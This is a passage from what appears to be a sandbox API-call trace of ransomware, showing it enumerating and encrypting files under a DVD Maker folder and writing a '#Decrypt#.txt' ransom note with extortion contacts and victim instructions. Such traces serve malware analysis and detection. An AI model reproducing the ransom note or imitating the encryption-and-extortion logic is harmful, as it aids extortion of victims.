nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.526] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.526] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 85 [0251.526] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.526] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.526] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.526] lstrlenW (lpString=".testttjffg") returned 11 [0251.526] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.526] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.527] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.527] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.527] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png") returned 91 [0251.527] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.527] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.527] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.527] lstrlenW (lpString=".testttjffg") returned 11 [0251.528] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.528] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.528] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.529] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.529] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png") returned 86 [0251.529] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.529] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.529] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.530] lstrlenW (lpString=".testttjffg") returned 11 [0251.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.531] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.531] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.531] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png") returned 92 [0251.531] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.531] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.531] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.531] lstrlenW (lpString=".testttjffg") returned 11 [0251.531] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.531] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.531] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.532] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.532] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.532] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png") returned 83 [0251.532] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.532] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.533] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.533] lstrlenW (lpString=".testttjffg") returned 11 [0251.533] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.534] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f199665, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f199665, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.534] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.534] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png") returned 89 [0251.534] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.534] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.534] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.534] lstrlenW (lpString=".testttjffg") returned 11 [0251.534] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.534] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.534] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.535] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0251.535] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0251.535] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 75 [0251.535] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.536] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.536] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.536] lstrlenW (lpString=".testttjffg") returned 11 [0251.536] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.536] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.536] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.536] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 0 [0251.536] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.537] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\#Decrypt#.txt") returned 66 [0251.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.539] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.539] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.540] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.540] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.540] CloseHandle (hObject=0x158) returned 1 [0251.540] GetProcessHeap () returned 0x780000 [0251.540] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.540] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75ba, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.540] lstrcmpiW (lpString1="Heart_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.540] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 71 [0251.540] StrStrIW (lpFirst="Heart_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.541] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.541] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.541] lstrlenW (lpString=".testttjffg") returned 11 [0251.541] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.541] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.541] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.541] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.542] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea2923b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea2923b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="heart_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.542] lstrcmpiW (lpString1="heart_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.542] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 73 [0251.542] StrStrIW (lpFirst="heart_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.542] lstrlenW (lpString=".testttjffg") returned 11 [0251.542] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.542] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.542] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.543] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1278, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.543] lstrcmpiW (lpString1="Heart_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.543] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 77 [0251.543] StrStrIW (lpFirst="Heart_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.543] lstrlenW (lpString=".testttjffg") returned 11 [0251.543] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.543] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.543] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.543] CreateFileW 